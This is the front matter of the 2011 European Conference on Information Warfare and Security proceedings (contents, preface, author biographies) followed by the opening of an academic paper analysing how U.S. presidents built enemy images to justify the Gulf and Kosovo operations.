(in) Security - Academic Conferences Limited
Proceedings of the 10th European Conference on Information Warfare and Security

The Institute of Cybernetics at the Tallinn University of Technology
Tallinn, Estonia
7-8 July 2011

Edited by Rain Ottis
Cooperative Cyber Defence Centre of Excellence
Tallinn, Estonia
Copyright The Authors, 2011. All Rights Reserved.

No reproduction, copy or transmission may be made without written permission from the individual authors.

Papers have been double-blind peer reviewed before final submission to the conference. Initially, paper abstracts were read and selected by the conference panel for submission as possible papers for the conference.

Many thanks to the reviewers who helped ensure the quality of the full papers.

These Conference Proceedings have been submitted to the Thomson ISI for indexing.

Further copies of this book can be purchased from http://academic-conferences.org/2-proceedings.htm

ISBN: 978-1-908272-07-2 CD

Published by Academic Publishing Limited
Reading
UK
44-118-972-4148
www.academic-publishing.org
Contents

Paper Title | Author(s) | Page No.
Preface | | iv
Biographies of Conference Chairs, Programme Chair, Keynote Speaker and Mini-track Chairs | | v
Biographies of contributing authors | | vi
Legitimate Defenses Against Dangerous Archenemies. The Justifications by U.S. Presidents for the Initiation of Military Operations in the Persian Gulf and Kosovo, 1991-2003 | Kari Alenius | 1
Use of Compression Methods for Data Security Assurance | Dominic Asamoah and William Oblitey | 6
Cyber Security: Time for Engagement and Debate | Debi Ashenden | 11
This is not a Cyber war, its a...? Wikileaks, Anonymous and the Politics of Hegemony | David Barnard-Wills | 17
Potential Threats of UAS Swarms and the Countermeasure's Need | Laurent Beaudoin, Antoine Gademer, Loica Avanthey, Vincent Germain and Vincent Vittori | 24
Developing Intelligence in the Field of Financing Terror - an Analytical Model of Anti-Terror Inter Agency and Cross Border Cooperation: The Security of Financial Systems Dimension | Alexander Bligh | 31
A Secure Architecture for Electronic Ticketing Based on the Portuguese e-ID Card | Paul Crocker and Vasco Nicolau | 38
Evaluation of the Armed Forces Websites of the European Countries | Pedro Cunha, Parcídio Gonçalves, Vítor Sá, Sérgio Tenreiro de Magalhães and Miguel Pimenta | 50
Estonia After the 2007 Cyber Attacks: Legal, Strategic and Organisational Changes in Cyber Security | Christian Czosseck, Rain Ottis and Anna-Maria Talihärm | 57
An Usage-Centric Botnet Taxonomy | Christian Czosseck and Karlis Podins | 65
User-Centric Information Security Systems - A Living lab Approach | Moses Dlamini, Jan Eloff, Marek Zielinski, Jason Chuang and Danie Smit | 73
Intrusion Detection Through Keystroke Dynamics | João Ferreira, Henrique Santos and Bernardo Patrão | 81
The Computer Security of Public/Open Computer Spaces: Feedback of a Field Study in Europe | Eric Filiol | 91
Perverting eMails: A new Dimension in Internet (in)Security | Eric Filiol, Jonathan Dechaux and Jean-Paul Fizaine | 106
Evaluating Cyber Security Awareness in South Africa | Marthie Grobler, Joey Jansen van Vuuren and Jannie Zaaiman | 113
Missionaries of Peace – The Creation of the Italian Identity in the Representation of the Political Discussion in Favour of Italy's Participation in the Iraq War in Il Corriere della Sera | Marja Härmänmaa | 122
Thoughts of war Theorists on Information Operations | Arto Hirvelä | 127
Live-Action Role-Play as a Scenario-Based Training Tool for Security and Emergency Services | Sara Hjalmarsson | 132
Computer Games as the Representation of Military Information Operations – A Philosophical Description of Cyborgizing of Propaganda Warfare | Aki-Mauri Huhtinen | 141
Information Security Culture or Information Safety Culture – What do Words Convey? | Ilona Ilvonen | 148
Strategic Communication and Revolution in Military Affairs: Describing Actions and Effects | Saara Jantunen | 155
A Case-Study on American Perspectives on Cyber and Security | Saara Jantunen and Aki-Mauri Huhtinen | 163
Evolutionary Algorithms for Optimal Selection of Security Measures | Jüri Kivimaa and Toomas Kirt | 172
Botnet Detection: A Numerical and Heuristic Analysis | Luís Mendonça and Henrique Santos | 185
Analysis and Modelling of Critical Infrastructure Systems | Graeme Pye and Matthew Warren | 194
Modelling Relational Aspects of Critical Infrastructure Systems | Graeme Pye and Matthew Warren | 202
A Study on Cyber Secured eGovernance in an Educational Institute: Performance and User Satisfaction | Kasi Raju | 211
Steps towards Monitoring Cyberarms Compliance | Neil Rowe, Simson Garfinkel, Robert Beverly and Panayotis Yannakogeorgos | 221
Distributed Denial of Service Attacks as Threat Vectors to Economic Infrastructure: Motives, Estimated Losses and Defense Against the HTTP/1.1 GET and SYN Floods Nightmares | Libor Sarga and Roman Jašek | 228
Legal Protection of Digital Information in the era of Information Warfare | Małgorzata Skórzewska-Amberg | 237
Criteria for a Personal Information Security Agent | Ewald Stieger and Rossouw von Solms | 245
International Criminal Cooperation in the Context of Cyber Incidents | Anna-Maria Talihärm | 253
Methods for Detecting Important Events and Knowledge From Data Security Logs | Risto Vaarandi | 261
Locating the Enemy | Marja Vuorinen | 267
Australian National Critical Infrastructure Protection: A Case Study | Matthew Warren and Shona Leitch | 375
PhD Papers | | 281
Security Considerations for Virtual Platform Provisioning | Mudassar Aslam and Christian Gehrmann | 283
A Mobile and Quick Terrorism | Anthony Desnos and Geoffroy Gueguen | 291
Regulatory Compliance to Ensure Information Security: Financial Supervision Perspective | Andro Kull | 298
Behaviour Profiling for Transparent Authentication for Mobile Devices | Fudong Li, Nathan Clarke, Maria Papadaki and Paul Dowland | 307
Description of a Practical Application of an Information Security Audit Framework | Teresa Pereira and Henrique Santos | 315
Fight Over Images of the State Armed Forces and Private Security Contractors | Mirva Salminen | 323
Non Academics | | 331
A Proposal for Domain Name System (DNS) Security Metrics Framework | Andrea Rigoni and Salvatore Di Blasi | 333
Work in progress | | 337
Malicious Flash Crash Attacks by Quote Stuffing: This is the way the (Financial) World Could end | Robert Erra | 339
Preface

This year sees the 10th European Conference on Information Warfare and Security (ECIW 2011), which is hosted by the Institute of Cybernetics (IoC) at Tallinn University of Technology in collaboration with the Cooperative Cyber Defence Centre of Excellence (CCD COE) in Tallinn, Estonia. The Conference Chair is Vahur Kotkas from IoC and I am pleased to be the Programme Chair.

The Conference continues to bring together individuals working in the area of Information Warfare and Information Security in order to share knowledge and develop new ideas with their peers. The range of papers presented at the Conference will ensure two days of interesting discussions. The topics covered this year illustrate the depth of the information operations' research area, with the subject matter ranging from the highly technical to the more strategic visions of the use and influence of information.

The opening keynote is given by Mr Raul Rebane from StratCom and the second day will be opened by Prof Enn Tyugu from CCD COE and IoC.

With an initial submission of 83 abstracts, after the double blind, peer review process there are 53 papers published in these Conference Proceedings. These papers come from all parts of the globe including Australia, Austria, Egypt, Estonia, Finland, France, Germany, Greece, India, Kuwait, Pakistan, Portugal, Romania, South Africa, Sweden, United Kingdom and the United States of America.

I wish you a most interesting conference and an enjoyable stay in Estonia.

Rain Ottis, PhD
July 2011
Biographies of Conference Chairs, Programme Chairs and Keynote Speakers

Conference Chair

Vahur Kotkas is a Development Manager of the Institute of Cybernetics at Tallinn University of Technology, Tallinn, Estonia. His research and activities are mostly related to engineering, modeling and simulations where Knowledge- and Logic-Based techniques are developed and applied in order to achieve comfortable and efficient platforms for modeling and for simulations. During the past few years Vahur has been active in Cyber Security related research under a contract with the Estonian MoD to develop suitable tools for Cyber Defence.

Programme Chair

Rain Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He previously served as a communications officer in the Estonian Defence Forces, focusing primarily on cyber defence training and awareness issues. He is a graduate of the United States Military Academy (BS, Computer Science) and Tallinn University of Technology (MSc, Informatics). He gained his PhD from Tallinn University of Technology, where his research focused on politically motivated cyber attack campaigns by non-state actors. Other research interests include cyber conflict and politically motivated cyber attacks.

Mini Track Chairs

Debi Ashenden is a Senior Research Fellow within the Defence College of Management and Technology at Cranfield University. Prior to taking up this post she was a Managing Consultant within QinetiQ's Trusted Information Management Department (formerly the Defence Evaluation Research Agency). She specialises in information assurance in general, and risk assessment in particular; other specific areas of interest include building trust for information sharing, governance processes for information assurance and information security awareness. Debi has worked extensively across government, defence and the finance sector as a consultant and her work concentrates on understanding the role of individuals in ensuring that security risks are mitigated. Debi has had a number of articles on information security published, has presented at a range of conferences and has co-authored a book for Butterworth Heinemann, 'Risk Management for Computer Security: Protecting Your Network & Information Assets'. Her current research examines the practice of information operations using discourse analysis.

Eric Adrien Filiol has been an officer in the French Army for 20 years. He is now head scientist officer and professor in a research lab working for different departments in France (justice, police and defense). He holds a PhD in mathematics and computer science, a habilitation thesis in computer science, an engineer diploma in cryptology and has graduated from NATO in InfoOps. His research work relates to computer security (especially computer virology and cryptanalysis) and cyber warfare with the attacker's mind.

Dr. Marja Härmänmaa is a university lecturer in Italian at the University of Helsinki. In addition to Critical Discourse Analysis and critical reading, her research interests include Italian literature and culture of the early 20th century.

Professor, LTC(G.S), Aki Huhtinen, PhD is Docent of practical philosophy in the University of Helsinki and Docent of social consequences of media and information technology in the University of Lapland. He is also Docent of information security and information operations in Tampere University of Technology. Aki works at the Department of Leadership and Military Pedagogy at the Finnish National Defence University.
Saara Jantunen has studied English language and culture in the University of Groningen in the Netherlands and English philology in the University of Helsinki. Her research interests are language & identity and military discourse. Jantunen currently works in education.

Marja Vuorinen is a social historian specializing in the study of elites and power within a theoretical framework of semiotics, text analysis and media studies. Marja holds a Doc. Soc. Sci. from the University of Helsinki.

Dr. Ken Webb's first career was in government special operations, including command of strategic counter-terrorist, intelligence-gathering and unconventional warfare units. Operations in the international security field then followed, where he developed a network of geostrategic relationships. Ken has completed an interdisciplinary PhD level government research project into enhancing national security from terrorist groups and has also been the counter-terrorism research leader for another Government initiative to identify and foster multi-disciplinary research into safeguarding countries from natural, human-caused, or accidental and terrorist acts. His exposure and research experience are in special operations, information warfare, national security and emergencies, organised crime and counter-terrorism.

Biographies of contributing authors (in alphabetical order)

Kari Alenius is Assistant Professor in the Department of History at the University of Oulu, Finland. His research interests include the history of propaganda and mental images, the history of Estonia between the World Wars and the history of ethnic minorities.

Dominic Asamoah holds a 2009 M.Phil. degree in Computer Science from the Kwame Nkrumah University of Science and Technology. He is a lecturer of Computer Science at that University.

Mudassar Aslam has been a researcher at the Swedish Institute of Computer Science (SICS) since March 2010. He is also registered as a PhD student in Mälardalens University, Västerås. He has his Masters in Information and Communication Systems Security from KTH. Currently, he is working on Security and Trust establishment in virtualized environments and clouds.

David Barnard-Wills is a Research Fellow in the Department of Informatics and Sensors, Cranfield University. He has previously worked in the School of Political Science and International Studies, the University of Birmingham, and for the Parliamentary Office of Science and Technology. Research interests include the politics of technology, surveillance and privacy.

Laurent Beaudoin received a PhD from Télécom Paristech in image processing and remote sensing. He has worked in Ecole Supérieure d'Informatique d'Electronique et d'Automatique (ESIEA), a French engineering school, since 2001. He founded in 2004 the Image and Signal Processing R&D department (ATIS laboratory). His main research activities concern Defence and Security, exploring robots (UAS, AUV), remote sensing and ICTs for persons with disabilities.

Alexander Bligh PhD (Columbia University, 1981) - Former advisor to the PM of Israel. President, Strategic Objects, an international strategic consulting firm. Former Chair of the Department of Political Science and Middle Eastern Studies, Ariel University Center, Israel, and visiting professor at Columbia University, U of Toronto, U of Notre Dame, etc.

Joobin Choobineh has a PhD from the University of Arizona. Research areas include Information Security, Management Information Systems, and Systems Analysis and Design. He has authored or been a coauthor of more than fifty (50) research articles. He is an Associate Editor of INFORMS Journal on Computing and serves on the editorial board of the International Journal of Business Information Systems.

Paul Crocker has a PhD in Mathematics from the University of Leeds, UK. After working in software development he joined the Computer Science Department at the University of Beira Interior, Portugal. His research and teaching interests include Parallel Computing, Security and Operating systems. He is a member of the Portuguese research Institute of Telecommunications.
Christian Czosseck is scientist at the CCD COE <strong>in</strong> Tall<strong>in</strong>n, Estonia. Serv<strong>in</strong>g <strong>in</strong> the German military for more<br />
than 12 years, he held several <strong>in</strong>formation assurance positions. Christian holds a M.Sc. equivalent <strong>in</strong><br />
computer science and is currently PhD student at the Estonian Bus<strong>in</strong>ess School <strong>in</strong> Tall<strong>in</strong>n look<strong>in</strong>g <strong>in</strong>to cyber<br />
security and botnet related issues.<br />
Anthony Desnos is currently a PhD Student at ESIEA (Operational Cryptology and Virology Laboratory) <strong>in</strong><br />
Laval, France. He is <strong>in</strong>volved <strong>in</strong> a number of open source security projects like Androguard. He had been<br />
speaker <strong>in</strong> various security/virology/<strong>in</strong>formation warfares conferences on different topics, <strong>in</strong>clud<strong>in</strong>g hack.lu,<br />
eicar, eciw, iawacs<br />
Moses Dlam<strong>in</strong>i received his BSc Computer Science and Mathematics at the University of Swaziland. He<br />
received his BSc Honours and MSc <strong>in</strong> Computer Science at the University of Pretoria, where he has now<br />
enrolled for a doctorate degree. Moses works at SAP Research Pretoria, as a PhD research associate.<br />
Salvatore Di Blasi is an Information security professional with a solid track record <strong>in</strong> secure software design<br />
and development; he is a Certified Professional Eng<strong>in</strong>eer and qualified as a ISO 27001 Lead Auditor. He<br />
currently works at Global Cyber <strong>Security</strong> Center (GCSEC) as an <strong>in</strong>formation security researcher.<br />
Robert Erra is Professor of CS and Scientific Director of the Masters <strong>in</strong> Network & Information <strong>Security</strong> at<br />
ESIEA Paris and Laval. He is <strong>in</strong>terested <strong>in</strong> developments of algorithms for <strong>in</strong>formation security, from<br />
cryptanalysis of asymmetric cryptography to malware analysis.<br />
João Ferreira is an Informatics Eng<strong>in</strong>eer<strong>in</strong>g MSc student enthusiastic about Information <strong>Security</strong>, and the<br />
field of Biometric <strong>Security</strong> <strong>in</strong> particular. For his ongo<strong>in</strong>g thesis, he is currently research<strong>in</strong>g methods for<br />
strengthen<strong>in</strong>g the reliability of Data Centric <strong>Security</strong> solutions.<br />
Arto Hirvelä (Major) is an <strong>in</strong>structor (leadership) <strong>in</strong> Research Group at the F<strong>in</strong>nish National Defence<br />
University. His research <strong>in</strong>terests are <strong>in</strong>formation environment and <strong>in</strong>formation operations.<br />
Sara Hjalmarsson is a security science honours student at Edith Cowan University of Perth, Western<br />
Australia. Her research revolves around the application of techniques from Live-Action Role-Play (LARP) to<br />
scenario-based tra<strong>in</strong><strong>in</strong>g. Sara has 10 years experience as an educator, participant and organiser of LARP <strong>in</strong><br />
Sweden and abroad. She currently resides <strong>in</strong> Sweden.<br />
Ilona Ilvonen is a doctoral student at Tampere University of Technology, department of Bus<strong>in</strong>ess<br />
Information Management and Logistics. Her doctoral thesis topic is the management of knowledge security,<br />
and the thesis is due <strong>in</strong> 2012. She has published conference papers on <strong>in</strong>formation security management,<br />
knowledge management and relat<strong>in</strong>g topics s<strong>in</strong>ce the year 2003.<br />
Abhaya Induruwa PhD, FBCS, FIET, FIESL, HonFCSSL, CEng, CITP, Int. PEng, is the Programme<br />
Director for MSc Forensic Comput<strong>in</strong>g and MSc Cybercrime Forensics of the Canterbury Christ Church<br />
University, United K<strong>in</strong>gdom. His research <strong>in</strong>terests <strong>in</strong>clude Pedagogic Issues <strong>in</strong> Cybercrime Forensics<br />
Education & Tra<strong>in</strong><strong>in</strong>g. His PhD supervisions <strong>in</strong>clude the automation of mobile phone forensic <strong>in</strong>vestigation.<br />
Saara Jantunen has studied English language and culture <strong>in</strong> the University of Gron<strong>in</strong>gen <strong>in</strong> the Netherlands<br />
and English philology <strong>in</strong> the University of Hels<strong>in</strong>ki. Her research <strong>in</strong>terests are language & identity and military<br />
discourse. Jantunen currently works <strong>in</strong> education.<br />
Saara Jantunen has studied English language and culture <strong>in</strong> the University of Gron<strong>in</strong>gen <strong>in</strong> the Netherlands<br />
and English philology <strong>in</strong> the University of Hels<strong>in</strong>ki. Her research <strong>in</strong>terests are language & identity and military<br />
discourse. Jantunen currently works <strong>in</strong> education.<br />
Toomas Kirt is a post-doc researcher at University of Tartu. In 2007 he received a PhD from Tall<strong>in</strong>n<br />
University of Technology. Research <strong>in</strong>terests <strong>in</strong>clude artificial <strong>in</strong>telligence, neural networks, pattern<br />
recognition and self-organization.<br />
Jyri Kivimaa is a scientist at NATO Cooperative Cyber Defence Center of Excellence. He graduated from<br />
Tall<strong>in</strong>n University of Technology <strong>in</strong> 1972 and s<strong>in</strong>ce 2009 he is a doctoral student at the Estonian Bus<strong>in</strong>ess<br />
School.<br />
vii
Noora Kotila<strong>in</strong>en (Master.Soc.Sci.) is a doctoral candidate at the Hels<strong>in</strong>ki University social science history<br />
department, and is work<strong>in</strong>g as a visit<strong>in</strong>g scholar at The F<strong>in</strong>nish Institute of International Affairs and as a<br />
researcher at Academy of F<strong>in</strong>land research project Ethics, Politics and Emergencies -Humanitarian Frame<br />
for Co-option and Collaboration <strong>in</strong> World Politics.<br />
Andro Kull is a Doctoral student at the University of Tampere s<strong>in</strong>ce 2005 and has graduated at University of<br />
Tartu <strong>in</strong> applied <strong>in</strong>formatics and Tall<strong>in</strong>n University <strong>in</strong> IT management. Last academic conference experience<br />
is from annual <strong>Security</strong> Conference held <strong>in</strong> Last Vegas 2010. The practical side, he was l<strong>in</strong>ked to security<br />
issues, and more recently <strong>in</strong> relation to f<strong>in</strong>ancial supervision. To ensure theoretical knowledge and practical<br />
experience, he has earned <strong>in</strong>ternational certifications CISA, CISM, and ABCP.<br />
Fudong Li is a PhD student with<strong>in</strong> the Centre for <strong>Security</strong>, Communication and Network Research at the<br />
University of Plymouth, where he previously completed a MRes degree on the subject of Network Systems<br />
Eng<strong>in</strong>eer<strong>in</strong>g. His research <strong>in</strong>terests are <strong>in</strong>trusion detection systems, mobile phone security, and user’s<br />
behaviour with<strong>in</strong> mobile device environment.<br />
Luís Costa Mendonça is currently f<strong>in</strong>ish<strong>in</strong>g the Master’s degree <strong>in</strong> Communication Networks and Services<br />
Eng<strong>in</strong>eer<strong>in</strong>g (MERSCOM) <strong>in</strong> University of M<strong>in</strong>ho. He has also been work<strong>in</strong>g <strong>in</strong> the IT <strong>in</strong>dustry for 12 year<br />
now <strong>in</strong> areas that span from software development to Datacenter design and ma<strong>in</strong>tenance. In the last years<br />
he has been digg<strong>in</strong>g deeper <strong>in</strong>to network security.<br />
Daniel NG, Ch<strong>in</strong>g WA started the career as computer programmer <strong>in</strong> 1990, and then progress<strong>in</strong>g towards<br />
ICT <strong>Security</strong>, Computer Forensics, F<strong>in</strong>ancial Account<strong>in</strong>g and Audit<strong>in</strong>g after millennium. Recently, he starts<br />
his PhD (<strong>Security</strong> & Forensics) <strong>in</strong> a UK reputable <strong>in</strong>stitute and The Hong Kong Daniel Polytechnic University,<br />
after earn<strong>in</strong>g a good stock options as a corporate director <strong>in</strong> a listed entity<br />
William Oblitey holds a 1988 Ph. D. degree <strong>in</strong> Computer and Information Sciences from the University of<br />
Pittsburgh. He is a professor of Computer Science at the Indiana University of.Pennsylvania.<br />
Kasi Raju is a Technical Superintendent in the Department of Computer Science and Engineering, Indian Institute of Technology - Madras, India. Post graduation in Mathematics at Loyola College, Madras (1981). Involved in systems and network administration. Recently acquired MBA (e-Governance), PGD (Cyber Laws), PGD (Cyber Security) and DIP (Cyber Crime Prosecution and Defence). Currently working in e-Governance, Cyber Forensics and Cyber Security.
Francisco Ribeiro is a student of Masters in Computer Engineering at the University of Minho. His specializations are "Network Engineering and Services" and "Encryption and Security of Information Systems". He also held a research fellowship in the field of bioinformatics.
Andrea Rigoni is Director General of the Global Cyber Security Center. With 20 years of working experience in the Information Security field, he is an expert on Cyber Security, Threat Awareness, Information Sharing and Incident and Crisis Management. He is a member of different expert groups, and is actively involved in many International and European initiatives.
Neil Rowe is Professor of Computer Science at the U.S. Naval Postgraduate School, where he has been since 1983. He has a Ph.D. in Computer Science from Stanford University (1983). His main research interests are the modeling of deception, information security, surveillance systems, image processing, and data mining.
Teresa Pereira is an Assistant Lecturer at the Superior School of Business Studies, Polytechnic Institute of Viana do Castelo, and a PhD student in the Department of Information Systems, University of Minho. She graduated in Mathematics and Computer Science, University of Minho (2002), and obtained an MSc degree in Information Technologies (pre-Bologna) in 2006. From 2002 to 2004 she worked as a researcher in the OmniPaper project (IST-2001-32174), funded under the Fifth Framework Programme. Research interests: Semantic Web, information management, ontologies, security audit, management information systems and information systems security.
Vítor Sá holds a five-year "licentiate" degree in Systems and Informatics Engineering and a Masters in Computer Science. His main activity has been teaching in higher education (currently at the Portuguese Catholic University). He lived for four years in Germany as a Guest Researcher at Fraunhofer IGD. He is doing his Ph.D. work in Biometric Authentication.
Mirva Salminen is a PhD student at the University of Tampere researching the outsourcing of the state’s security functions. She has studied International Relations and Political Science at the University of Tampere, Military History and Strategy at the Finnish National Defence University, and Security Studies at Aberystwyth University in the United Kingdom.
Henrique Dinis Santos has a Degree in Electric and Electronic Engineering, University of Coimbra, Portugal, 1984, and a PhD in Computer Engineering, University of Minho, Portugal, 1996. He is currently Associate Professor, Information Systems Department, University of Minho, responsible for graduate/postgraduate courses, and has supervised several dissertations in the Information Security and Computer Architecture areas. He is President of a national Technical Committee (CT 136) related to information system security standards. In 1990, under the ERASMUS program, he taught at the University of Bristol, UK, where he was recognized as University Academic staff.
Libor Sarga is a doctoral worker at the Department of Statistics and Quantitative Methods, Faculty of Management and Economics, Tomas Bata University in Zlín. His dissertation work will focus on security and information technology applications and their effects on the virtualized economy. His personal interests include following technology, hardware and software trends, and literature along with music.
Malgorzata Skorzewska-Amberg graduated from the University of Warsaw (LL.D.) as well as Warsaw University of Technology (MSc IT). Appointed Assistant Professor in 2009, Faculty of Law, Kozminski University Warsaw. For 17 years Senior IT Lecturer, Warsaw University of Technology. Research specialization combining two academic fields: digital data protection from a legal as well as a technical point of view.
Ewald Stieger is currently studying towards an MTech IT degree at the Nelson Mandela Metropolitan University in Port Elizabeth, South Africa. His subject of interest during the 4th year was Information Security and he decided to continue with research in that field. The research he is conducting is concerned with influencing users towards more secure.
Anna-Maria Talihärm is working in the NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) Legal and Policy Branch, where her areas of research include European Union information society law, cyber terrorism and cyber crime. She is also currently striving for a PhD degree at Tartu University, specialising in legal aspects of cyber crime.
Risto Vaarandi received his PhD degree in Computer Engineering from Tallinn University of Technology in June 2005. Since May 2006, he has held a position as a scientist at CCD CoE. Risto's research interests include event correlation, data mining for event logs, network security, and system monitoring.
Joey Jansen van Vuuren is Research Group Leader Cyber Defence for Scientific Research, CSIR South Africa, mainly involved in research for SANDF and Government sectors on Cyber Defence. MSc from UNISA and researcher for 25 years. Focuses research around national security and analysis of cyber threats using non-quantitative modelling techniques. Actively involved in facilitating Cyber awareness programs in South Africa.
Matt Warren is the Head of School at the School of Information System, Deakin University, Australia. He has gained international recognition for his scholarly work in the areas of Information Security, Risk Analysis, Electronic Commerce and Information Warfare. He has authored/co-authored over 180 books, book chapters, journal and conference papers.
Legitimate Defenses Against Dangerous Archenemies: The Justifications by U.S. Presidents for the Initiation of Military Operations in the Persian Gulf and Kosovo, 1991-2003
Kari Alenius
University of Oulu, Finland
kari.alenius@oulu.fi
Abstract: This study will analyze how Presidents of the United States justified the initiation of military operations in three different cases: against Iraq in the Persian Gulf in the years 1991 and 2003 and against Yugoslavia/Serbia in Kosovo in 1999. It is evident that these justifications exploited the most classical elements of a general image of the enemy, and mainly only those. The justifications that Presidents offered the public for the initiation of military operations and the image that they attempted to portray of the enemy were thereby almost identical in all of the cases. Therefore, it can be concluded that speeches were for the most part built on a theoretical basis, and they did not necessarily have to be based on a reality of the actual country in question. Admittedly, similar features could be found in Iraqi and Serbian actions which it was possible to utilize in the construction of an image, but the identity of the image was first and foremost due to the identity of its use. The purpose was each time to justify why the United States took the offensive operation far beyond its own boundaries and without being attacked itself. In this case it was necessary to describe the actions, goals and the nature of the enemy in the most negative light, and one’s own corresponding case was to be described in the best possible positive light. Only in this way was it possible to achieve sufficient justification for the initiation of one’s own military operations. There was no room for bringing forth compromises or understanding the views of the other party.
Keywords: propaganda, rhetoric, enmity, United States, Iraq, Kosovo
1. Introduction
As a theoretical basis for the formation of general images of the enemy, for instance Ofer Zur’s (1991: 345-364) outlined classification of 1991 may be used. The contents of public speeches made by U.S. Presidents can then be compared to this theoretical model. In 1991 George Bush was President, in 1999 William (Bill) Clinton and in 2003 George W. Bush. Each of them gave 4-6 pre-prepared broad public speeches relating to the topic just before the initiation of military operations or immediately after they had begun.
Ofer Zur (1991: 352) has presented the logic of enemy image construction in the form of the following chart (see Figure 1). The chart is not complete, nor is it the only possible one that can illustrate the polarity between ‘us’ and ‘others’. To the chart presented by Zur we could add a few opposing pairs such as ‘malicious – benevolent’. On the other hand, in Zur’s chart ‘defense department – war department’ is actually only one practical application of the principled opposing pair ‘defensive – offensive’. It would be possible to add almost limitless similar variations on the same theme. The chart presented by Zur is however useful in its main characteristics and corresponds to the findings of several other researchers (e.g. Aho, 1994; Gergen and Gergen, 1986, 124-157, 310-315; Harle, 2000: 10-18; Wunsch, 2002: 82-85) who have also examined enemy images theoretically.
An analysis can be initiated, for example, from the opposing pair ‘barbaric – humane’, continuing to circle the chart in a counter-clockwise pattern.
Barbarity or cruelty or brutality is undoubtedly one of the traditional features attached to the enemy. Already in ancient Greece, from where the term derived to later European use, it was a central feature by which one’s own were separated from foreigners (Harle, 2000, 40-42). Ideas of indifference towards the suffering of others and reluctance to respect other people’s interests (Bush, 1991-01-05; Clinton, 1999-03-24a; Bush, 2003-03-01), in short inhumanity, are closely linked to the formation of the image of the enemy as one of barbarity. Respectively, one’s own side behaves selflessly, respecting the dignity of others, for instance in taking care of the well-being of civilians uninvolved in military action, regardless of their nationality (Bush, 1991-01-16; Clinton, 1999-03-27; Bush, 2003-03-08).
‘Tyranny’ against ‘good leadership’ is a feature that, when connected with the image of the enemy, is directed before all else to the subordinates of leaders. The enemy can behave tyrannically towards outsiders, but at the same time the ordinary citizens of the enemy country suffer even more from tyranny. Therefore, the leaders of the enemy act contrary to the interests of their own citizens. They have come to power and stayed there either through the strength of their false promises, misleading their subordinates, or by using violence to boost their status (Bush, 1991-01-09; Clinton, 1999-03-24a; Bush, 2003-03-19).
Figure 1: Chart showing positive and negative qualities within the split of ‘us – them’, by Ofer Zur (1991: 352)
2. Applying the basic features of an evil enemy to Iraq and Yugoslavia
Thus, it can be argued that by one’s actions against the leadership of the enemy, not only the best interests of one’s own citizenry but also those of the ordinary people of the enemy country are advanced. According to this logic, attacking the leadership of the enemy is a good deed which selflessly serves almost all people. The psychological threshold of eliminating dangerous individuals is also lower than if one had to justify a crackdown on an entire people. At the same time, the possibility for success of one’s own plans appears substantially larger.
The unreliability of the enemy is an important element especially when justifying why negotiations should not be continued. By arguing that the other party has betrayed its promises in the past (Bush, 1991-01-16; Clinton, 1999-03-24b; Bush, 2003-03-08) listeners are placed in a situation of no choice: the resumption of negotiations would be pointless and stupid, because the opponent would surely violate any possible agreements in the future also. With this logic, harder measures such as the use of military attack appear as the only competent way in which to solve problems. Anticipating the goals and motivations of the opponent with a suspicious and hostile tone is also one of the basic elements of the logic that separates ‘us’ and ‘others’ (Zur, 1991: 356-358).
If the enemy is unreliable and brutal, he has more than likely committed crimes through the effect of these basic characteristics. In these examined cases also the leadership of the enemy were directly branded as criminals (Bush, 1990-12-24; Clinton, 1999-04-05; Bush, 2003-03-01). Indeed, by Western legal principles no individual can be called a criminal before his case has been examined in court and he has been convicted. Such a process had not taken place either in the case of Iraqi or Serbian leaders until 2003; therefore there was no legal basis for naming them criminals. Perhaps this is why there was no attempt to even justify the argument in the speeches of U.S. Presidents, but it was presented merely as a statement among other issues. Moral stigmatization was more important than legal consistency.
Of Zur’s opposites, only primitiveness did not appear as such in the speeches analyzed here. However, the idea appeared indirectly when speeches referred to the civilized world and its values. If in speeches the civilized world was against dictators (Bush, 1991-01-08; Bush, 2003-03-01), logically the dictators represented the non-civilized, primitivity. Civilization, like most other terms being analyzed, was basically a completely subjective interpretation. It did not have universal or generally accepted criteria even in American culture. Thanks to its being a very loaded term, civilization was nevertheless well-suited to propagandistic use. The criteria’s basic room for interpretation was also more of an advantage than a disadvantage in propagandistic use, as there was no great danger of being caught ‘misinterpreting’ civilization.
The distinction between ‘good versus evil’ can be regarded more as the sum of different components than as an individual element separating ‘us’ and ‘others’. This is why the concept did not generally present itself as such in the speeches of the Presidents. The only exception was George Bush’s (Bush, 1991-01-09) ‘Open Letter to College Students’ in January 1991. In it the President presented the issue by cleanly taking advantage of dichotomy. In propagandistic use the terms ‘good’ and ‘evil’ might be perceived as problematic due to their all-inclusiveness. Listeners may feel that their opinions are being directed in a bothersome way, if they are placed directly in front of the broadest possible conclusion: one’s own side is good and the enemy is evil. It is more effective to lead listeners without notice and gradually towards the same conclusion (Taylor, 2003: 6). Therefore, it pays to construct the opponent’s evil by referring to barbarism, unreliability, primitivity and other similar features. At the same time the alleged evil will be more credibly justified than if the end result was stated directly.
The paired concept of ‘innocent – guilty’ frequently appeared in the speeches of the Presidents (Bush, 1991-01-05; Clinton, 1999-03-24a; Bush, 2003-03-19). It was told that the opponent was guilty of crimes, and at the same time his victims were reported as innocent. Basically, the same considerations previously made in analyzing the concept of crime apply to this paired concept. The opponent’s guilt was stated indirectly by making him responsible for the outbreak or imminent outbreak of war. When one’s side initiates military operations, according to this logic it is not an attack, but an inherent consequence of natural law resulting from the evil deeds of the enemy. By acting the wrong way the enemy initiates military operations against himself (Zur, 1991: 356-358). At the same time, the responsibility for human suffering and material destruction that is always caused by war goes to the enemy.
Closely related to the aforementioned, one’s own actions are described as defensive, without exception. Although in a tactical or operational sense the question would be about attacks against the enemy, in a strategic sense the question is nevertheless about defence. For instance, one’s own forces defend civilization, justice, humanity and innocent civilians (Bush, 1991-01-09; Clinton, 1999-03-27; Bush, 2003-03-08). Respectively, the actions of the enemy are always aggressive (Bush, 1990-12-24; Clinton, 1999-04-03; Bush, 2003-03-16), and their possible strategic motives of defence cannot be taken into public consideration. From a moral and legal perspective defence is generally accepted, but as a rule attack is not. At the very least demonstrating that attack is legitimate is difficult, and the outcome on the audience’s part is unsure. Thus, it is preferable to try to demonstrate that one’s own actions are always defensive regardless of their outward appearance, and that the actions of the opponent are aggressive.
